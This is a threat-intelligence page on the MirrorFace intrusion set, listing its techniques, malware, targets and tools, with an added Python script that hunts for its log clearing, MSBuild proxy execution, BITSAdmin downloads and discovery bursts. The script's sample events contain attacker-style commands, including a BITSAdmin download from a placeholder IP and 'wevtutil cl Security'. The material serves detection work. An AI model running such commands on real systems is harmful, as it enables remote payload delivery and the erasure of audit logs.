MirrorFace
Essential information
- Confidence: 100/100
- Published: 21/12/2025 04:36
- Modified: 04/05/2026 16:33
- Updated at: 04/05/2026 16:33
- Revoked: No
- Author / Source: AlienVault
- Resource level: —
- Primary motivation: —
- Related entities: 2 reports, 77 attack patterns (MITRE), 12 malware, 6 sectors, 1 country, 16 indicators, 1 vulnerability (CVE), 8 tools, 1 campaign
Marking (TLP)
- TLP:CLEAR
Related entities
Attack patterns, malware, vulnerabilities, indicators and other entities linked to this intrusion set.
Reports (2)
- Report linking 5 malware, 6 observables and 1 APT
- Report linking 1 CVE, 21 MITRE attack patterns, 2 malware, 27 observables and 1 APT
Attack patterns (MITRE) (77, 11 shown)
- T1127.001 MSBuild
- T1070.001 Clear Windows Event Logs
- T1074.002 Remote Data Staging
- T1057 Process Discovery
- T1204.002 Malicious File
- T1003 OS Credential Dumping
- T1587.001 Malware
- T1564 Hide Artifacts
- T1083 File and Directory Discovery
- T1005 Data from Local System
- T1140 Deobfuscate/Decode Files or Information
Malware (12)
- UPPERCUT
- LODEINFO
- ROAMINGHOUSE
- DOWNIISSA
- NOOPLDR
- FaceXInjector
- UPPERCUT (MITRE S0275)
- HiddenFace
- MirrorStealer
- NOOPDOOR
- AsyncRAT
- Cobalt Strike
Sectors (6)
- Academic Institutions
- Diplomacy
- Media
- Defense
- Political parties
- Government
Countries (1)
- Japan
Indicators (16, 9 shown)
- All nine indicators shown are STIX pattern indicators from AlienVault with confidence 100/100, and all are revoked; their valid-until dates are 13/08/2025 (2 indicators), 04/10/2025 (1) and 05/11/2025 (6).
Vulnerabilities (CVE) (1)
- F5 BIG-IP contains a missing authentication in critical function vulnerability which can allow for remote code execution, creation or deletion of files, … (published 10/05/2022, modified 20/12/2025)
Tool (8)
All eight entries are MITRE ATT&CK software records (source: The MITRE Corporation, confidence 100).
- [Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.
- [ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration.
- The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. …
- [Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.
- [nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution.
- The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. …
- [BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197).
- [Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections.
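The attack-pattern and tool lists above are a compact hunting brief: log clearing with wevtutil (T1070.001), MSBuild as a proxy execution host (T1127.001), BITSAdmin download jobs (the BITS Jobs technique T1197 its entry links to), and the discovery utilities (ipconfig, net, nltest, nbtstat, tasklist, ping) run in quick succession. The script below is an added example, not code from this page, AlienVault or MITRE; it runs those rules over constructed process-creation records reduced to the fields Sysmon Event ID 1 or Security 4688 would carry (image, command line, parent image, user, host). The sample events, the 5-minute window, the four-distinct-tool threshold and the list of "scripting host" parents are assumptions made for the example.

```python
"""Hunting rules for the MirrorFace TTPs listed on this page, run over
constructed process-creation events. Added example; not code from the page,
AlienVault or MITRE. Events, window and thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery utilities listed under Tool on the page. One of them alone is
# ordinary admin noise; several distinct ones by one user in a short window is
# the signal (assumed threshold).
DISCOVERY_TOOLS = {"ipconfig.exe", "net.exe", "net1.exe", "nltest.exe",
                   "nbtstat.exe", "tasklist.exe", "ping.exe"}
# Parents from which MSBuild is rarely launched legitimately (assumption).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
BURST_WINDOW = timedelta(minutes=5)   # assumption
BURST_MIN_TOOLS = 4                   # assumption

def _ev(ts, host, user, image, cmd, parent):
    return {"ts": ts, "host": host, "user": user, "image": image,
            "cmd": cmd, "parent": parent}

CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = "C:\\Windows\\System32\\"
MSB = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"

# Constructed sample events. 203.0.113.7 is a documentation-range address.
EVENTS = [
    _ev("2025-11-03T09:00:01", "WS01", "CORP\\alice", S32 + "ipconfig.exe", "ipconfig /all", CMD),
    _ev("2025-11-03T09:00:15", "WS01", "CORP\\alice", S32 + "net.exe", 'net group "domain admins" /domain', CMD),
    _ev("2025-11-03T09:00:40", "WS01", "CORP\\alice", S32 + "nltest.exe", "nltest /dclist:corp", CMD),
    _ev("2025-11-03T09:01:05", "WS01", "CORP\\alice", S32 + "tasklist.exe", "tasklist /v", CMD),
    _ev("2025-11-03T09:02:10", "WS01", "CORP\\alice", S32 + "nbtstat.exe", "nbtstat -n", CMD),
    _ev("2025-11-03T09:10:00", "WS01", "CORP\\alice", S32 + "bitsadmin.exe",
        "bitsadmin /transfer upd /download /priority normal http://203.0.113.7/u.dat "
        "C:\\Users\\alice\\AppData\\Local\\Temp\\u.dat", CMD),
    _ev("2025-11-03T09:12:00", "WS01", "CORP\\alice", MSB,
        r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\b.xml", CMD),
    _ev("2025-11-03T09:30:00", "WS01", "CORP\\alice", S32 + "wevtutil.exe", "wevtutil cl Security", PS),
    # benign activity on another host: one discovery tool, an IDE build, a log query
    _ev("2025-11-03T10:00:00", "WS02", "CORP\\bob", S32 + "ping.exe", "ping 10.0.0.1", CMD),
    _ev("2025-11-03T10:05:00", "WS02", "CORP\\bob", MSB, "MSBuild.exe app.csproj",
        r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"),
    _ev("2025-11-03T10:06:00", "WS02", "CORP\\bob", S32 + "wevtutil.exe", "wevtutil qe System /c:5", PS),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def match_single(ev):
    """Per-event rules; returns (technique, severity, detail) or None."""
    img, cmd, parent = basename(ev["image"]), ev["cmd"].lower(), basename(ev["parent"])
    if img == "wevtutil.exe" and re.search(r"\b(cl|clear-log)\b", cmd):
        return ("T1070.001", "high", "wevtutil clearing an event log")
    if img == "msbuild.exe" and parent in SCRIPT_HOSTS:
        return ("T1127.001", "medium", "MSBuild launched from a scripting host")
    if img == "bitsadmin.exe" and "/transfer" in cmd and re.search(r"https?://", cmd):
        return ("T1197", "medium", "BITSAdmin download job")
    return None

def find_discovery_bursts(events):
    """Count distinct discovery tools per (host, user) inside a sliding window."""
    runs = defaultdict(list)
    for ev in events:
        tool = basename(ev["image"])
        if tool in DISCOVERY_TOOLS:
            runs[(ev["host"], ev["user"])].append((datetime.fromisoformat(ev["ts"]), tool))
    hits = []
    for (host, user), seq in runs.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            tools = {t for ts, t in seq[i:] if ts - t0 <= BURST_WINDOW}
            if len(tools) >= BURST_MIN_TOOLS:
                hits.append({"ts": t0.isoformat(), "host": host, "user": user,
                             "technique": "T1057", "severity": "medium",
                             "detail": "discovery burst: " + ", ".join(sorted(tools))})
                break   # one alert per actor per run is enough
    return hits

def hunt(events):
    """Run every rule; single-event alerts first (in event order), then bursts."""
    alerts = []
    for ev in events:
        m = match_single(ev)
        if m:
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                           "technique": m[0], "severity": m[1], "detail": m[2]})
    alerts.extend(find_discovery_bursts(events))
    return alerts

if __name__ == "__main__":
    for a in hunt(EVENTS):
        print(f'{a["ts"]} {a["host"]} {a["user"]} {a["technique"]} [{a["severity"]}] {a["detail"]}')
```

On the sample data the four alerts all land on WS01/alice; bob's lone ping, IDE-spawned MSBuild and `wevtutil qe` query produce nothing, which is the point of keying MSBuild on its parent and wevtutil on the `cl`/`clear-log` verb rather than on the binary name alone. In a real pipeline the same three fields come straight from Sysmon's Image, CommandLine and ParentImage, and the burst rule should be tuned against a baseline of the environment's own admin tooling before the threshold is trusted.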
Campaign (1)
- Operation AkaiRyū (attributed to MirrorFace)